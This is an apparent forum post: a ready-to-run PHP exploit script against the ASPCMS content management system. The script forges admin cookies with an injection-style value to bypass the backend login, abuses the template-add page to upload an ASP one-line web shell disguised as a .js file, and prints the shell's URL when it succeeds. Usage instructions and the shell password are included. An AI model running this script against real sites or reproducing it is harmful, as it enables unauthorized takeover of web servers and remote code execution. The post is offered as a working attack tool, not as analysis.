ASPCMS绕过后台验证拿webshell【针对可绕过cookie的版本】

2013-05-10 12:21:15 9 3292
<?php 
print_r('
+---------------------------------------------------------------------------+
ASPCMS绕过后台验证拿webshell
说明:/templates/cn/html/c.asp;.js 密码123
+---------------------------------------------------------------------------+
');
if ($argc <2){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url path
Example:
php '.$argv[0].' localhost
php '.$argv[0].' localhost /admin%5Faspcms/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$url = $argv[1];
$path = $argv[2]?$argv[2]:'/admin%5Faspcms/';
$path = $path .'/_style/AspCms_TemplateAdd.asp?acttype=html&action=add';

$ret=exploit($url,$path);
$scan="添加成功";
if (strpos($ret,$scan)){
        echo "WEBSHELL已拿到\r\n";
        echo "http://$url/templates/cn/html/f.asp;.js";
        exit;
}

function exploit($host,$path){
        $pmsg="filename=f.asp%3B.js&filetext=%3C%25eval+request%28%22123%22%29%25%3E";
        $len=strlen($pmsg);
        $payload ="POST $path HTTP/1.1\r\n";
        $payload.="Host: $host\r\n";
        $payload.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1\r\n";
        $payload.="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $payload.="Accept-Language: en-us,en;q=0.5\r\n";
        $payload.="Accept-Encoding:  deflate\r\n";
        $payload.="Connection: close\r\n";
        $payload.="Cookie: adminName=admin;groupMenu=all;adminrand='or+loginname%3d'admin\r\n";
        $payload.="Content-Type: application/x-www-form-urlencoded\r\n";
        $payload.="Content-Length: $len\r\n\r\n";
        $payload.=$pmsg;
         $fp = fsockopen($host, 80);
    fputs($fp, $payload);
   
    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
   
    return $resp;
}
?>

关于作者

payload14篇文章544篇回复

评论9次

要评论?请先  登录  或  注册